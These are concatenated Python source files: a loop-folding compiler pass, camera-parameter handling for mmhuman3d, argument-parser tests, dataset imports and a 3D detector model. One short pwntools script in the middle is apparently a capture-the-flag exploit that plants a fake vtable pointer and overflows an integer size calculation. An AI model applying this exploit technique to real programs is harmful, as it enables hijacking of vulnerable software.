uindices=t1.uindices + t1_uindex))
modified_root.append(t2._rebuild(uindices=t2.uindices + t2_uindex))
# Temporary arrays can now be moved onto the stack
exprs = FindNodes(Expression).visit(modified_tree[-1])
if all(not j.is_Remainder for j in modified_tree):
dimensions = tuple(j.limits[0] for j in modified_root)
for j in exprs:
if j.write.is_Array:
j_dimensions = dimensions + j.write.dimensions[len(modified_root):]
j_shape = tuple(k.symbolic_size for k in j_dimensions)
j.write.update(shape=j_shape, dimensions=j_dimensions, onstack=True)
# Substitute iteration variables within the folded trees
modified_tree = compose_nodes(modified_tree)
replaced = xreplace_indices([j.expr for j in exprs], mapper, only_rhs=True)
subs = [j._rebuild(expr=k) for j, k in zip(exprs, replaced)]
processed.append(Transformer(dict(zip(exprs, subs))).visit(modified_tree))
# Introduce the new iteration variables within /root/
modified_root = compose_nodes(modified_root)
exprs = FindNodes(Expression).visit(modified_root)
candidates = [as_symbol(j.output) for j in subs]
replaced = xreplace_indices([j.expr for j in exprs], mapper, candidates)
subs = [j._rebuild(expr=k) for j, k in zip(exprs, replaced)]
root = Transformer(dict(zip(exprs, subs))).visit(modified_root)
return processed + [root]
class IterationFold(Iteration):
"""
An IterationFold is a special :class:`Iteration` object that represents
a sequence of consecutive (in program order) Iterations. In an IterationFold,
all Iterations of the sequence but the so called ``root`` are "hidden"; that is,
they cannot be visited by an Iteration/Expression tree visitor.
The Iterations in the sequence represented by the IterationFold all have same
dimension and properties. However, their extent is relative to that of the ``root``.
"""
is_IterationFold = True
def __init__(self, *args, **kwargs):
self.folds = kwargs.pop('folds', None)
super(IterationFold, self).__init__(*args, **kwargs)
def __repr__(self):
properties = ""
if self.properties:
properties = [str(i) for i in self.properties]
properties = "WithProperties[%s]::" % ",".join(properties)
index = self.index
if self.uindices:
index += '[%s]' % ','.join(ccode(i.index) for i in self.uindices)
length = "Length %d" % len(self.folds)
return "<%sIterationFold %s; %s; %s>" % (properties, index, self.limits, length)
@property
def ccode(self):
comment = c.Comment('This IterationFold is "hiding" one or more Iterations')
code = super(IterationFold, self).ccode
return c.Module([comment, code])
def unfold(self):
"""
Return the corresponding :class:`Iteration` objects from each fold in ``self``.
"""
args = self.args
args.pop('folds')
# Construct the root Iteration
root = Iteration(**args)
# Construct the folds
args.pop('nodes')
ofs = args.pop('offsets')
try:
start, end, incr = args.pop('limits')
except TypeError:
start, end, incr = self.limits
folds = tuple(Iteration(nodes, limits=(start, end, incr),
offsets=tuple(i-j for i, j in zip(ofs, shift)), **args)
for shift, nodes in self.folds)
return folds + as_tuple(root)
|
66985
|
from .monitor_bad_pixel_bokeh import BadPixelMonitor
from .monitor_bias_bokeh import BiasMonitor
from .monitor_dark_bokeh import DarkMonitor
from .monitor_filesystem_bokeh import MonitorFilesystem
from .monitor_mast_bokeh import MastMonitor
from .monitor_readnoise_bokeh import ReadnoiseMonitor
|
66995
|
import pytest
from configargparse import Namespace
from pydpiper.core.arguments import CompoundParser, AnnotatedParser, application_parser, parse #, lsq6_parser, lsq12_parser
from pydpiper.pipelines.MBM import mbm_parser
# TODO should these test files be named test_*?
# should these be fixtures or not?
@pytest.fixture
def two_mbm_parser():
return CompoundParser([AnnotatedParser(parser=mbm_parser, prefix="mbm1", namespace="mbm1"),
AnnotatedParser(parser=mbm_parser, prefix="mbm2", namespace="mbm2")])
@pytest.fixture
def four_mbm_parser(two_mbm_parser):
return CompoundParser([AnnotatedParser(parser=two_mbm_parser, prefix="first-two", namespace="first_two"),
AnnotatedParser(parser=two_mbm_parser, prefix="last-two", namespace="last_two")])
@pytest.fixture()
def two_mbm_parse(two_mbm_parser):
return parse(two_mbm_parser, ["--mbm1-lsq12-max-pairs=22", "--mbm1-bootstrap", "--mbm2-bootstrap"])
@pytest.fixture()
def four_mbm_parse(four_mbm_parser):
return parse(four_mbm_parser, ["--first-two-mbm1-lsq12-max-pairs=22",
"--first-two-mbm2-lsq12-max-pairs", "23",
"--last-two-mbm1-lsq12-max-pairs=24",
"--last-two-mbm2-lsq12-max-pairs=25",
"--first-two-mbm1-bootstrap", "--first-two-mbm2-bootstrap",
"--last-two-mbm1-bootstrap", "--last-two-mbm2-bootstrap"])
@pytest.fixture()
def application_parse(two_mbm_parser):
return parse(CompoundParser([application_parser,
AnnotatedParser(parser=two_mbm_parser, prefix="two-mbms", namespace="two-mbms")]),
["--two-mbms-mbm1-bootstrap", "--two-mbms-mbm2-bootstrap",
"--two-mbms-mbm1-lsq12-max-pairs", "23", "--two-mbms-mbm2-lsq12-max-pairs=24", "img_1.mnc"])
def is_recursive_subnamespace(n1, n2):
"""Is n1 a recursive substructure (not a subset!) of n2?"""
return all((f in n2.__dict__ and
(n1.__dict__[f] == n2.__dict__[f] or
(type(n1.__dict__[f]) == type(n2.__dict__[f]) == Namespace and
is_recursive_subnamespace(n1.__dict__[f], n2.__dict__[f])))
for f in n1.__dict__))
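# Example: Namespace(a=1) is a recursive substructure of Namespace(a=1, b=2),
# but Namespace(a=1, c=3) is not, because 'c' is absent from the larger namespace.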
class TestArgumentParsing():
def test_nested_parsing(self, two_mbm_parse):
assert is_recursive_subnamespace(Namespace(mbm1=Namespace(lsq12=Namespace(max_pairs=22)),
mbm2=Namespace(lsq12=Namespace(max_pairs=25))),
two_mbm_parse)
def test_deeper_nesting(self, four_mbm_parse):
assert is_recursive_subnamespace(Namespace(first_two=Namespace(mbm1=Namespace(lsq12=Namespace(max_pairs=22)),
mbm2=Namespace(lsq12=Namespace(max_pairs=23))),
last_two=Namespace(mbm1=Namespace(lsq12=Namespace(max_pairs=24)),
mbm2=Namespace(lsq12=Namespace(max_pairs=25)))),
four_mbm_parse)
def test_with_files(self, application_parse):
assert is_recursive_subnamespace(Namespace(application=Namespace(files=["img_1.mnc"]),
mbm=Namespace(lsq12=Namespace(max_pairs=20))),
application_parse)
|
67045
|
import json
import warnings
from enum import Enum
from typing import Any, List, Tuple, Union
import numpy as np
import torch
from mmhuman3d.core.cameras.cameras import PerspectiveCameras
from mmhuman3d.core.conventions.cameras.convert_convention import (
convert_camera_matrix,
convert_K_3x3_to_4x4,
convert_K_4x4_to_3x3,
)
from .builder import build_cameras
_CAMERA_PARAMETER_SUPPORTED_KEYS_ = {
'H': {
'type': int,
},
'W': {
'type': int,
},
'in_mat': {
'type': list,
'len': 3,
},
'rotation_mat': {
'type': list,
'len': 3,
},
'translation': {
'type': list,
'len': 3,
},
'k1': {
'type': float,
},
'k2': {
'type': float,
},
'k3': {
'type': float,
},
'k4': {
'type': float,
},
'k5': {
'type': float,
},
'k6': {
'type': float,
},
'p1': {
'type': float,
},
'p2': {
'type': float,
},
}
class _TypeValidation(Enum):
MATCH = 0
ARRAY = 1
FAIL = 2
class CameraParameter:
logger = None
SUPPORTED_KEYS = _CAMERA_PARAMETER_SUPPORTED_KEYS_
def __init__(self,
name: str = 'default',
H: int = 1080,
W: int = 1920) -> None:
"""
Args:
name (str, optional):
Name of this camera. Defaults to "default".
H (int, optional):
Height of a frame, in pixel. Defaults to 1080.
W (int, optional):
Width of a frame, in pixel. Defaults to 1920.
"""
self.name = name
self.parameters_dict = {}
in_mat = __zero_mat_list__(3)
self.parameters_dict['in_mat'] = in_mat
for distort_name in __distort_coefficient_names__:
self.parameters_dict[distort_name] = 0.0
_, H = self.validate_item('H', H)
self.parameters_dict['H'] = H
_, W = self.validate_item('W', W)
self.parameters_dict['W'] = W
r_mat = __zero_mat_list__(3)
self.parameters_dict['rotation_mat'] = r_mat
t_list = [0.0, 0.0, 0.0]
self.parameters_dict['translation'] = t_list
def reset_distort(self) -> None:
"""Reset all distort coefficients to zero."""
for distort_name in __distort_coefficient_names__:
self.parameters_dict[distort_name] = 0.0
def get_opencv_distort_mat(self) -> np.ndarray:
"""Get a numpy array of 8 distort coefficients, which is the distCoeffs
arg of cv2.undistort.
Returns:
ndarray:
(k_1, k_2, p_1, p_2, k_3, k_4, k_5, k_6) of 8 elements.
"""
dist_coeffs = [
self.get_value('k1'),
self.get_value('k2'),
self.get_value('p1'),
self.get_value('p2'),
self.get_value('k3'),
self.get_value('k4'),
self.get_value('k5'),
self.get_value('k6'),
]
dist_coeffs = np.array(dist_coeffs)
return dist_coeffs
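# Usage sketch (assumes OpenCV is installed):
# import cv2
# undistorted = cv2.undistort(img, cam_param.get_mat_np('in_mat'),
#                             cam_param.get_opencv_distort_mat())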
def set_KRT(self,
K_mat: np.ndarray,
R_mat: np.ndarray,
T_vec: np.ndarray,
inverse_extrinsic: bool = False) -> None:
"""Set intrinsic and extrinsic of a camera.
Args:
K_mat (np.ndarray):
In shape [3, 3].
R_mat (np.ndarray):
Rotation from world to view in default.
In shape [3, 3].
T_vec (np.ndarray):
Translation from world to view in default.
In shape [3,].
inverse_extrinsic (bool, optional):
If true, R_mat and T_vec transform a point
from view to world. Defaults to False.
"""
k_shape = K_mat.shape
assert k_shape[0] == k_shape[1] == 3
r_shape = R_mat.shape
assert r_shape[0] == r_shape[1] == 3
assert T_vec.ndim == 1 and T_vec.shape[0] == 3
self.set_mat_np('in_mat', K_mat)
if inverse_extrinsic:
R_mat = np.linalg.inv(R_mat)
T_vec = -np.dot(R_mat, T_vec).reshape((3))
self.set_mat_np('rotation_mat', R_mat)
self.set_value('translation', T_vec.tolist())
def get_KRT(self, k_dim=3) -> List[np.ndarray]:
"""Get intrinsic and extrinsic of a camera.
Args:
k_dim (int, optional):
Dimension of the returned mat K.
Defaults to 3.
Raises:
ValueError: k_dim is neither 3 nor 4.
Returns:
List[np.ndarray]:
K_mat (np.ndarray):
In shape [3, 3].
R_mat (np.ndarray):
Rotation from world to view in default.
In shape [3, 3].
T_vec (np.ndarray):
Translation from world to view in default.
In shape [3,].
"""
K_3x3 = self.get_mat_np('in_mat')
R_mat = self.get_mat_np('rotation_mat')
T_vec = np.asarray(self.get_value('translation'))
if k_dim == 3:
return [K_3x3, R_mat, T_vec]
elif k_dim == 4:
K_3x3 = np.expand_dims(K_3x3, 0) # shape (1, 3, 3)
K_4x4 = convert_K_3x3_to_4x4(
K=K_3x3, is_perspective=True) # shape (1, 4, 4)
K_4x4 = K_4x4[0, :, :]
return [K_4x4, R_mat, T_vec]
else:
raise ValueError(f'K mat cannot be converted to {k_dim}x{k_dim}')
def set_mat_np(self, mat_key: str, mat_numpy: np.ndarray) -> None:
"""Set a matrix-type parameter to mat_numpy.
Args:
mat_key (str):
Key of the target matrix. in_mat or rotation_mat.
mat_numpy (ndarray):
Matrix in numpy format.
Raises:
TypeError:
mat_numpy is not an np.ndarray.
"""
if not isinstance(mat_numpy, np.ndarray):
raise TypeError
self.set_mat_list(mat_key, mat_numpy.tolist())
def set_mat_list(self, mat_key: str, mat_list: List[list]) -> None:
"""Set a matrix-type parameter to mat_list.
Args:
mat_key (str):
Key of the target matrix. in_mat or rotation_mat.
mat_list (List[list]):
Matrix in list format.
"""
_, mat_list = self.validate_item(mat_key, mat_list)
self.parameters_dict[mat_key] = mat_list
def set_value(self, key: str, value: Any) -> None:
"""Set a parameter to value.
Args:
key (str):
Name of the parameter.
value (object):
New value of the parameter.
"""
_, value = self.validate_item(key, value)
self.parameters_dict[key] = value
def get_value(self, key: str) -> Any:
"""Get a parameter by key.
Args:
key (str):
Name of the parameter.
Raises:
KeyError: key not in self.parameters_dict
Returns:
object:
Value of the parameter.
"""
if key not in self.parameters_dict:
raise KeyError(key)
else:
return self.parameters_dict[key]
def get_mat_np(self, key: str) -> np.ndarray:
"""Get a a matrix-type parameter by key.
Args:
key (str):
Name of the parameter.
Raises:
KeyError: key not in self.parameters_dict
Returns:
ndarray:
Value of the parameter.
"""
if key not in self.parameters_dict:
raise KeyError(key)
else:
mat_list = self.parameters_dict[key]
mat_np = np.array(mat_list).reshape((3, 3))
return mat_np
def to_string(self) -> str:
"""Convert self.to_dict() to a string.
Returns:
str:
A dict in json string format.
"""
dump_dict = self.to_dict()
ret_str = json.dumps(dump_dict)
return ret_str
def to_dict(self) -> dict:
"""Dump camera name and parameters to dict.
Returns:
dict:
Put self.name and self.parameters_dict
in one dict.
"""
dump_dict = self.parameters_dict.copy()
dump_dict['name'] = self.name
return dump_dict
def dump(self, json_path: str) -> None:
"""Dump camera name and parameters to a file.
Returns:
dict:
Put self.name and self.parameters_dict
in one dict, and dump them to a json file.
"""
dump_dict = self.to_dict()
with open(json_path, 'w') as f_write:
json.dump(dump_dict, f_write)
def load(self, json_path: str) -> None:
"""Load camera name and parameters from a file."""
with open(json_path, 'r') as f_read:
dumped_dict = json.load(f_read)
self.load_from_dict(dumped_dict)
def load_from_dict(self, json_dict: dict) -> None:
"""Load name and parameters from a dict.
Args:
json_dict (dict):
A dict comes from self.to_dict().
"""
for key in json_dict.keys():
if key == 'name':
self.name = json_dict[key]
elif key == 'rotation':
self.parameters_dict['rotation_mat'] = np.array(
json_dict[key]).reshape(3, 3).tolist()
elif key == 'translation':
self.parameters_dict[key] = np.array(json_dict[key]).reshape(
(3)).tolist()
else:
self.parameters_dict[key] = json_dict[key]
if '_mat' in key:
self.parameters_dict[key] = np.array(
self.parameters_dict[key]).reshape(3, 3).tolist()
def load_from_chessboard(self,
chessboard_dict: dict,
name: str,
inverse: bool = True) -> None:
"""Load name and parameters from a dict.
Args:
chessboard_dict (dict):
A dict loaded from json.load(chessboard_file).
name (str):
Name of this camera.
inverse (bool, optional):
Whether to invert the rotation and translation matrices.
Defaults to True.
"""
camera_param_dict = \
__parse_chessboard_param__(chessboard_dict, name, inverse=inverse)
self.load_from_dict(camera_param_dict)
def load_kinect_from_smc(self, smc_reader, kinect_id: int) -> None:
"""Load name and parameters of a kinect from an SmcReader instance.
Args:
smc_reader (mmhuman3d.data.data_structures.smc_reader.SMCReader):
An SmcReader instance containing kinect camera parameters.
kinect_id (int):
Id of the target kinect.
"""
name = kinect_id
extrinsics_dict = \
smc_reader.get_kinect_color_extrinsics(
kinect_id, homogeneous=False
)
rot_np = extrinsics_dict['R']
trans_np = extrinsics_dict['T']
intrinsics_np = \
smc_reader.get_kinect_color_intrinsics(
kinect_id
)
resolution = \
smc_reader.get_kinect_color_resolution(
kinect_id
)
rmatrix = np.linalg.inv(rot_np).reshape(3, 3)
tvec = -np.dot(rmatrix, trans_np)
self.name = name
self.set_mat_np('in_mat', intrinsics_np)
self.set_mat_np('rotation_mat', rmatrix)
self.set_value('translation', tvec.tolist())
self.set_value('H', resolution[1])
self.set_value('W', resolution[0])
def load_iphone_from_smc(self,
smc_reader,
iphone_id: int = 0,
frame_id: int = 0) -> None:
"""Load name and parameters of an iPhone from an SmcReader instance.
Args:
smc_reader (mmhuman3d.data.data_structures.smc_reader.SMCReader):
An SmcReader instance containing iPhone camera parameters.
iphone_id (int):
Id of the target iphone.
Defaults to 0.
frame_id (int):
Frame ID of one selected frame.
It only influences the intrinsics.
Defaults to 0.
"""
name = f'iPhone_{iphone_id}'
extrinsics_mat = \
smc_reader.get_iphone_extrinsics(
iphone_id, homogeneous=True
)
rot_np = extrinsics_mat[:3, :3]
trans_np = extrinsics_mat[:3, 3]
intrinsics_np = \
smc_reader.get_iphone_intrinsics(
iphone_id, frame_id
)
resolution = \
smc_reader.get_iphone_color_resolution(
iphone_id
)
rmatrix = np.linalg.inv(rot_np).reshape(3, 3)
tvec = -np.dot(rmatrix, trans_np)
self.name = name
self.set_mat_np('in_mat', intrinsics_np)
self.set_mat_np('rotation_mat', rmatrix)
self.set_value('translation', tvec.tolist())
self.set_value('H', resolution[1])
self.set_value('W', resolution[0])
@classmethod
def load_from_perspective_cameras(cls,
cam,
name: str,
resolution: Union[List, Tuple] = None):
"""Load parameters from a PerspectiveCameras and return a
CameraParameter.
Args:
cam (mmhuman3d.core.cameras.cameras.PerspectiveCameras):
An instance.
name (str):
Name of this camera.
"""
assert isinstance(cam, PerspectiveCameras
), 'Wrong input, support PerspectiveCameras only!'
if len(cam) > 1:
warnings.warn('Will only use the first camera in the batch.')
cam = cam[0]
resolution = resolution if resolution is not None else cam.resolution[
0].tolist()
height, width = int(resolution[0]), int(resolution[1])
cam_param = CameraParameter(H=height, W=width, name=name)
k_4x4 = cam.K # shape (1, 4, 4)
r_3x3 = cam.R # shape (1, 3, 3)
t_3 = cam.T # shape (1, 3)
is_perspective = cam.is_perspective()
in_ndc = cam.in_ndc()
k_4x4, r_3x3, t_3 = convert_camera_matrix(
K=k_4x4,
R=r_3x3,
T=t_3,
is_perspective=False,
in_ndc_dst=False,
in_ndc_src=in_ndc,
convention_src='pytorch3d',
convention_dst='opencv',
resolution_src=(height, width),
resolution_dst=(height, width))
k_3x3 = \
convert_K_4x4_to_3x3(k_4x4, is_perspective=is_perspective)
k_3x3 = k_3x3.numpy()[0]
r_3x3 = r_3x3.numpy()[0]
t_3 = t_3.numpy()[0]
cam_param.name = name
cam_param.set_mat_np('in_mat', k_3x3)
cam_param.set_mat_np('rotation_mat', r_3x3)
cam_param.set_value('translation', t_3.tolist())
cam_param.parameters_dict.update(H=height)
cam_param.parameters_dict.update(W=width)
return cam_param
def export_to_perspective_cameras(self) -> PerspectiveCameras:
"""Export to a opencv defined screen space PerspectiveCameras.
Returns:
Same defined PerspectiveCameras of batch_size 1.
"""
height = self.parameters_dict['H']
width = self.parameters_dict['W']
k_4x4, rotation, translation = self.get_KRT(k_dim=4)
k_4x4 = np.expand_dims(k_4x4, 0)  # shape (1, 4, 4)
rotation = np.expand_dims(rotation, 0) # shape (1, 3, 3)
translation = np.expand_dims(translation, 0) # shape (1, 3)
new_K = torch.from_numpy(k_4x4)
new_R = torch.from_numpy(rotation)
new_T = torch.from_numpy(translation)
cam = build_cameras(
dict(
type='PerspectiveCameras',
K=new_K.float(),
R=new_R.float(),
T=new_T.float(),
convention='opencv',
in_ndc=False,
resolution=(height, width)))
return cam
def validate_item(self, key: Any, val: Any) -> List:
"""Check whether the key and its value matches definition in
CameraParameter.SUPPORTED_KEYS.
Args:
key (Any):
Key in CameraParameter.
val (Any):
Value to the key.
Raises:
KeyError:
key cannot be found in
CameraParameter.SUPPORTED_KEYS.
TypeError:
Value's type doesn't match definition.
Returns:
key (Any): The input key.
val (Any): The value casted into correct format.
"""
self.__check_key__(key)
formatted_val = self.__validate_value_type__(key, val)
return key, formatted_val
def __check_key__(self, key: Any) -> None:
"""Check whether the key matches definition in
CameraParameter.SUPPORTED_KEYS.
Args:
key (Any):
Key in CameraParameter.
Raises:
KeyError:
key cannot be found in
CameraParameter.SUPPORTED_KEYS.
"""
if key not in self.__class__.SUPPORTED_KEYS:
err_msg = 'Key check failed in CameraParameter:\n'
err_msg += f'key={str(key)}\n'
raise KeyError(err_msg)
def __validate_value_type__(self, key: Any, val: Any) -> Any:
"""Check whether the type of value matches definition in
CameraParameter.SUPPORTED_KEYS.
Args:
key (Any):
Key in CameraParameter.
val (Any):
Value to the key.
Raises:
TypeError:
Value is supported but doesn't match definition.
Returns:
val (Any): The value casted into correct format.
"""
np_type_mapping = {int: np.integer, float: np.floating}
supported_keys = self.__class__.SUPPORTED_KEYS
validation_result = _TypeValidation.FAIL
ret_val = None
if supported_keys[key]['type'] == int or\
supported_keys[key]['type'] == float:
type_str = str(type(val))
class_name = type_str.split('\'')[1]
if type(val) == self.__class__.SUPPORTED_KEYS[key]['type']:
validation_result = _TypeValidation.MATCH
ret_val = val
elif class_name.startswith('numpy'):
# a value is required, not array
if np.issubdtype(
type(val),
np_type_mapping[supported_keys[key]['type']]):
validation_result = _TypeValidation.MATCH
ret_val = val.astype(supported_keys[key]['type'])
elif np.issubdtype(type(val), np.ndarray):
validation_result = _TypeValidation.ARRAY
elif class_name.startswith('torch'):
# only one element tensors
# can be converted to Python scalars
if len(val.size()) == 0:
val_item = val.item()
if type(val_item) == supported_keys[key]['type']:
validation_result = _TypeValidation.MATCH
ret_val = val_item
else:
validation_result = _TypeValidation.ARRAY
else:
if type(val) == self.__class__.SUPPORTED_KEYS[key]['type']:
validation_result = _TypeValidation.MATCH
ret_val = val
if validation_result != _TypeValidation.MATCH:
err_msg = 'Type check failed in CameraParameter:\n'
err_msg += f'key={str(key)}\n'
err_msg += f'type(val)={type(val)}\n'
if validation_result == _TypeValidation.ARRAY:
err_msg += 'A single value is expected, ' +\
'neither an array nor a slice.\n'
raise TypeError(err_msg)
return ret_val
def __parse_chessboard_param__(chessboard_camera_param, name, inverse=True):
"""Parse a dict loaded from chessboard file into another dict needed by
CameraParameter.
Args:
chessboard_camera_param (dict):
A dict loaded from json.load(chessboard_file).
name (str):
Name of this camera.
inverse (bool, optional):
Whether to invert the rotation and translation matrices.
Defaults to True.
Returns:
dict:
A dict of parameters in CameraParameter.to_dict() format.
"""
camera_param_dict = {}
camera_param_dict['H'] = chessboard_camera_param['imgSize'][1]
camera_param_dict['W'] = chessboard_camera_param['imgSize'][0]
camera_param_dict['in_mat'] = chessboard_camera_param['K']
camera_param_dict['k1'] = 0
camera_param_dict['k2'] = 0
camera_param_dict['k3'] = 0
camera_param_dict['k4'] = 0
camera_param_dict['k5'] = 0
camera_param_dict['k6'] = 0
camera_param_dict['p1'] = 0
camera_param_dict['p2'] = 0
camera_param_dict['name'] = name
camera_param_dict['rotation'] = chessboard_camera_param['R']
camera_param_dict['translation'] = chessboard_camera_param['T']
if inverse:
rmatrix = np.linalg.inv(
np.array(camera_param_dict['rotation']).reshape(3, 3))
camera_param_dict['rotation'] = rmatrix.tolist()
tmatrix = np.array(camera_param_dict['translation']).reshape((3, 1))
tvec = -np.dot(rmatrix, tmatrix)
camera_param_dict['translation'] = tvec.reshape((3)).tolist()
return camera_param_dict
__distort_coefficient_names__ = [
'k1', 'k2', 'k3', 'k4', 'k5', 'k6', 'p1', 'p2'
]
def __zero_mat_list__(n=3):
"""Return a zero mat in list format.
Args:
n (int, optional):
Length of the edge.
Defaults to 3.
Returns:
list:
List[List[int]]
"""
ret_list = [[0] * n for _ in range(n)]
return ret_list
|
67056
|
from .data import (
TxtTokLmdb,
DetectFeatLmdb,
ImageLmdbGroup,
ConcatDatasetWithLens,
)
from .loader import PrefetchLoader, MetaLoader
from .vqa import (
VqaEvalDataset,
vqa_collate,
vqa_eval_collate,
UNITER_VqaDataset,
)
from .ve import (
VeEvalDataset,
ve_collate,
ve_eval_collate,
UNITER_VeDataset,
)
from .nlvr2 import (
Nlvr2PairedDataset,
Nlvr2PairedEvalDataset,
Nlvr2TripletDataset,
Nlvr2TripletEvalDataset,
nlvr2_paired_collate,
nlvr2_paired_eval_collate,
nlvr2_triplet_collate,
nlvr2_triplet_eval_collate,
UNITER_NLVR2Dataset,
)
from .itm import (
TokenBucketSamplerForItm,
ItmDataset,
itm_collate,
itm_ot_collate,
ItmRankDataset,
ItmValDataset,
ItmEvalDataset,
ItmRankDatasetHardNegFromImage,
ItmRankDatasetHardNegFromText,
itm_rank_collate,
itm_val_collate,
itm_eval_collate,
itm_rank_hn_collate,
)
from .mlm import MlmDataset, mlm_collate
from .mrm import MrfrDataset, MrcDataset, mrfr_collate, mrc_collate
from .vcr import (
VcrTxtTokLmdb,
VcrEvalDataset,
vcr_collate,
vcr_eval_collate,
UNITER_VcrDataset,
)
from .re import (
ReTxtTokLmdb,
ReDataset,
ReEvalDataset,
re_collate,
re_eval_collate,
)
__all__ = [
'UNITER_VqaDataset',
'UNITER_VcrDataset',
'UNITER_NLVR2Dataset',
'UNITER_VeDataset',
]
|
67067
|
from pwn import *
# Create item
print('1')
FUNC = 0x701e40
#FUNC = 0x41414141 + 0x18
vtable_ptr = FUNC-0x18
print(p64(vtable_ptr) * 8) # name - pointer to fake vtable (Python 2 style; on Python 3, write raw bytes via sys.stdout.buffer instead of print)
print('bob') # description
print('1.23') # price
# Add item to basket
print('4')
print('1') # second item, added above
print('288230376151711745') # quantity - (2**64 / 64) + 1
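# 288230376151711745 == 2**58 + 1; assuming a 64-byte item size, the 64-bit total
# size wraps to 64 while the quantity itself stays huge, triggering the overflow.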
# Check out
print('6')
|
67086
|
from .detector3d_template import Detector3DTemplate
class PartA2Net(Detector3DTemplate):
def __init__(self, model_cfg, num_class, dataset):
super().__init__(model_cfg=model_cfg, num_class=num_class, dataset=dataset)
self.module_list = self.build_networks()
def forward(self, batch_dict):
for cur_module in self.module_list:
batch_dict = cur_module(batch_dict)
if self.training:
loss, tb_dict, disp_dict = self.get_training_loss()
ret_dict = {
'loss': loss
}
return ret_dict, tb_dict, disp_dict
else:
pred_dicts, recall_dicts = self.post_processing(batch_dict)
return pred_dicts, recall_dicts
def get_training_loss(self):
disp_dict = {}
loss_rpn, tb_dict = self.dense_head.get_loss()
loss_point, tb_dict = self.point_head.get_loss(tb_dict)
loss_rcnn, tb_dict = self.roi_head.get_loss(tb_dict)
if hasattr(self, 'history_query') and self.history_query is not None \
and self.history_query.model_cfg.get("LOSS_CONFIG", None) is not None:
loss_hist_query, tb_dict = self.history_query.get_loss(tb_dict)
loss = loss_rpn + loss_point + loss_rcnn + loss_hist_query
else:
loss = loss_rpn + loss_point + loss_rcnn
return loss, tb_dict, disp_dict
|